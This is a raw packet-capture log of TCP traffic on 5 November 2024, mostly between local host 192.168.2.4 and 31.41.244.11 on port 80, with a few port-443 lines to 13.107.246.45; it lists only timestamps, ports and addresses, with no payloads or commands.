Nov 5, 2024 18:46:09.447904110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447926998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447993040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448030949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448117971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448128939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448138952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448153019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448163986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448168993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448174953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448189020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448226929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448235989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448246002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448256016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448266029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448270082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448301077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448331118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448440075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448450089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448460102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448484898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448498964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448563099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448574066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448585033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448596954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448611975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448625088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448640108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448646069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448651075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448662996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.448673964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448693037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.448796034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449134111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449148893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449160099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449186087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449207067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449250937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449264050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449274063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449285030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449286938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449302912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449321985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449429989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449440956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449451923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449465036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449476004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449480057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449486971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449487925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449497938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449508905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449513912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449520111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.449536085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.449563026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.466826916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.466888905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.466959000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.466970921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.466980934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467005014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467020035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467029095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467034101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467041016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467045069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467051029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467068911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467101097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467128038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467138052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467147112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467156887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467165947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467169046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467206955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467228889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467235088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467245102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467278957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467288017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467389107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467398882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467442036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467458963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467466116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467477083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467492104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467502117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467514038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467545986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467576027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467586994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467596054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467606068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467616081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467621088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467648029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467679977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467760086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467770100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467777967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467808008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467830896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467890978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467900991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467911005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467921019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467931032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.467943907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467969894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.467998981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468029976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468039989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468049049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468060017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468071938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468091965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468122005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468472004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468482018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468492985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468521118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468530893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468549013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468559980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468569994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468583107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468586922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468615055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468641996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468650103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468652010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468662977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468672037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468684912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468689919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468698978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468703032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468708992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468733072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468750954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468877077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468887091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468897104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468907118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468916893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468919992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468926907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.468950987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.468976974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469034910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469044924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469054937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469063997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469073057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469079018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469095945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469106913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469115973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469118118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469146013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469167948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469230890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469275951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469300985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469316959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469340086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469356060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469436884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469446898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469455957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469472885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469476938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469491959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469496965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469511986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469532013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469552994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469563007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469572067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469580889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469593048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469613075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469639063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469649076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469657898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469667912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469679117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469712019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469739914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469749928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469759941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469769001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.469783068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469815016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.469964027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470017910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470020056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470029116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470060110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470072985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470155001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470165968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470175028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470185995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470201015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470232964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470237970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470244884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470253944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470269918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470308065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470335007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470346928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470355988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470366001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470376015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470376968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470391989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470403910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470413923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470437050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470572948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470597982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470607996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470623016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470643044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470712900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470722914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470731974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470736980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470767975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470789909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470870972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470880985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470890045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470900059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.470927000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.470937014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.514414072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.514492035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.514599085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.514642954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.517671108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.517683029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.517693043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.517716885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.517754078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.521578074 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.522023916 CET	49815	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.522037983 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.522453070 CET	49815	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.522458076 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.566704035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566751957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566761971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566771984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.566793919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566802025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.566828966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.566842079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.566894054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566910982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566922903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566946030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.566968918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.566981077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.566992998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567012072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567022085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567034006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567049980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567060947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567075014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567112923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567394018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567406893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567419052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567451954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567472935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567477942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567517996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567540884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567554951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567576885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567598104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567610979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567622900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567652941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567665100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567795038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567806005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567816973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567842007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567859888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567872047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567876101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567888021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567898035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567902088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567910910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567928076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.567929983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567948103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.567971945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.568078041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.568089008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.568100929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.568114042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.568123102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.568125963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.568151951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.568166018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.568876982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.568918943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569106102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569117069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569128990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569150925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569170952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569171906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569181919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569191933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569202900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569204092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569221020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569252968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569331884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569346905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569361925 CET	80	49804	31.41.244.11	192.168.2.4
